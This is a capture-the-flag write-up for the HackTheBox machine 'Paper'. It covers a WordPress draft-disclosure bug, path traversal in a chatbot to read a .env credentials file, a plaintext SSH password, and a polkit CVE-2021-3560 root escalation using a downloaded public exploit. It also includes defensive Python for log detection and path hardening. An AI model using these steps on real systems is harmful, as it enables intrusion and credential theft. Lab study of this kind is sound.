Paper - [HTB]

    Paper is a fairly easy Linux machine from HackTheBox. The attacker first exploits a WordPress vulnerability (CVE-2019-17671) to reach a chat web application, then abuses a chatbot's features to obtain a user shell. Finally, the well-known polkit vulnerability (CVE-2021-3560) is exploited to become root.


    As always, we start by finding all open ports on the machine with Nmap.

    kali@kali:~/Documents/HTB/Paper$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.043s latency).
    Not shown: 61511 closed ports, 4021 filtered ports
    22/tcp  open  ssh
    80/tcp  open  http
    443/tcp open  https

    Then we run a deeper scan of each open port to gather more information about every service.

    kali@kali:~/Documents/HTB/Paper$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,443
    Nmap scan report for
    Host is up (0.042s latency).
    22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
    |   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
    |_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
    80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
    |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    |_http-title: HTTP Server Test Page powered by CentOS
    443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
    |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    |_http-title: HTTP Server Test Page powered by CentOS
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
    | Subject Alternative Name: DNS:localhost.localdomain
    | Not valid before: 2021-07-03T08:52:34
    |_Not valid after:  2022-07-08T10:32:34
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Mon Feb 14 15:19:20 2022 -- 1 IP address (1 host up) scanned in 16.38 seconds

    Looking at the HTTP response headers, we find the domain office.paper in the X-Backend-Server header.

    kali@kali:~/Documents/HTB/Paper$ curl -i
    HTTP/1.1 404 Not Found
    Date: Mon, 14 Feb 2022 21:09:28 GMT
    Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    X-Backend-Server: office.paper
    Content-Length: 196
    Content-Type: text/html; charset=iso-8859-1
    <title>404 Not Found</title>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>

    Once the domain is added to /etc/hosts, we can access its WordPress site.

    Blunder Tiffin

    wpscan shows that this WordPress version has a known vulnerability.

    kali@kali:~/Documents/HTB/Paper$ wpscan --url http://office.paper/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
    | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
    |     Fixed in: 5.2.4
    |     References:

    Exploitation 1

    We can exploit it by requesting http://office.paper/?static=1, which returns the unpublished drafts. Among the drafts we find a registration link.

    Micheal please remove the secret from drafts for gods sake!
    Hello employees of Blunder Tiffin,
    Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
    So, I kindly request you all to take your discussions from the public blog to a more private chat system.
    # Warning for Michael
    Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
    Threat Level Midnight
    Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
    # Secret Registration URL of new Employee chat system
    # I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
    # Also, stop looking at my drafts. Jeez!

    This link leads to the chat web application.
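    As an added example (not part of the original writeup), the following Python parses Apache combined-format access log lines and flags successful requests carrying the static query parameter used above, which is the signature a defender would hunt for on a WordPress install older than 5.2.4; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not captured from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [14/Feb/2022:21:10:02 +0000] "GET /?static=1 HTTP/1.1" 200 8421 "-" "curl/7.81.0"
10.10.14.5 - - [14/Feb/2022:21:10:09 +0000] "GET /?static=1&order=asc HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
10.10.14.7 - - [14/Feb/2022:21:11:30 +0000] "GET /wp-login.php HTTP/1.1" 200 1890 "-" "Mozilla/5.0"
10.10.14.8 - - [14/Feb/2022:21:12:00 +0000] "GET /?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def is_static_draft_probe(target):
    """True when the request target carries WordPress's 'static' query parameter,
    the query abused by CVE-2019-17671 to render private and draft posts."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return "static" in query


def find_draft_leaks(log_text):
    """Return (ip, target, status) for every successful request that matches the probe.
    A 200 matters because on a patched site the same request would not expose drafts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if is_static_draft_probe(m["target"]) and m["status"] == "200":
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, target, status in find_draft_leaks(SAMPLE_LOG):
        print(f"draft probe from {ip}: {target} -> {status}")
```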

    Once registered and logged in, we find a bot in the general channel with instructions on how to use it.

    Bot chat

    To interact with recyclops, we need to create a private chat.

    Recyclops private chat

    As we can see, recyclops can list files under the /sales/ folder.


    Exploitation 2

    Moreover, it is vulnerable to path traversal, so we can list files from directories above /sales/.
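    As an added illustration (not code from the box or from Hubot), the following Python contrasts the naive directory listing that makes the bot traversable with a hardened version that resolves the requested path and refuses anything outside the allowed base; the sandbox layout and file names are constructed here.

```python
import os
import tempfile


def list_dir_vulnerable(base, user_path):
    """Naive join, as the bot behaves: '../' in user_path walks out of base."""
    return sorted(os.listdir(os.path.join(base, user_path)))


def list_dir_hardened(base, user_path):
    """Resolve symlinks and '..' first, then require the result to stay under base."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    # commonpath also catches an absolute user_path, which os.path.join would let replace base
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError(f"path escapes {base_real}: {user_path!r}")
    return sorted(os.listdir(target))


def make_sandbox():
    """Constructed layout mimicking the box: a home dir holding sales/ and hubot/.env."""
    home = tempfile.mkdtemp(prefix="dwight-home-")
    os.makedirs(os.path.join(home, "sales", "sale"))
    os.makedirs(os.path.join(home, "hubot"))
    with open(os.path.join(home, "sales", "sale", "portfolio.txt"), "w") as f:
        f.write("constructed sample\n")
    with open(os.path.join(home, "hubot", ".env"), "w") as f:
        f.write("ROCKETCHAT_PASSWORD=<placeholder>\n")  # placeholder, not the real secret
    return os.path.join(home, "sales")


def escaped(base, user_path):
    """True if the hardened lister rejects user_path as leaving base."""
    try:
        list_dir_hardened(base, user_path)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    sales = make_sandbox()
    print("vulnerable ../hubot ->", list_dir_vulnerable(sales, "../hubot"))
    print("hardened   ../hubot -> rejected:", escaped(sales, "../hubot"))
```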

    dwight's home directory

    Under the ../hubot/ directory there is a .env file.

    hubot files

    The .env file contains recyclops' credentials.

    Configuration file

    The same credentials let us log in to the machine as dwight over SSH.

    kali@kali:~/Documents/HTB/Paper$ ssh dwight@office.paper
    dwight@office.paper's password: Queenofblad3s!23
    [dwight@paper ~]$ cat user.txt 

    Privilege Escalation

    Using LinPEAS, we find that the polkit agent helper (/usr/lib/polkit-1/polkit-agent-helper-1) is a SUID binary.

    SUID - Check easy privesc, exploits and write perms
    -rwsr-xr-x. 1 root root  61K May 11  2019 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
    -rwsr-xr-x  1 root root  34K May 11  2019 /usr/bin/fusermount3
    -rwsr-xr-x. 1 root root  38K May 11  2019 /usr/bin/fusermount
    -rwsr-xr-x. 1 root root  18K May 11  2019 /usr/lib/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x  1 root root  65K Nov  8  2019 /usr/bin/crontab
    -rwsr-xr-x  1 root root  33K Apr  6  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
    -rwsr-xr-x  1 root root  21K Feb  2  2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)

    We can therefore become root with a public exploit for CVE-2021-3560.

    [dwight@paper tmp]$ wget
    --2022-02-14 17:06:44--
    Connecting to connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2434 (2.4K) [text/plain]
    Saving to: ‘’
    100%[==============>]   2.38K  --.-KB/s    in 0s
    2022-02-14 17:06:44 (295 MB/s) - ‘’ saved [2434/2434]
    [dwight@paper tmp]$ python3
    [+] Timed out at: 0.00890119250816805
    [+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
    bash: cannot set terminal process group (79814): Inappropriate ioctl for device
    bash: no job control in this shell
    [root@paper tmp]# cat /root/root.txt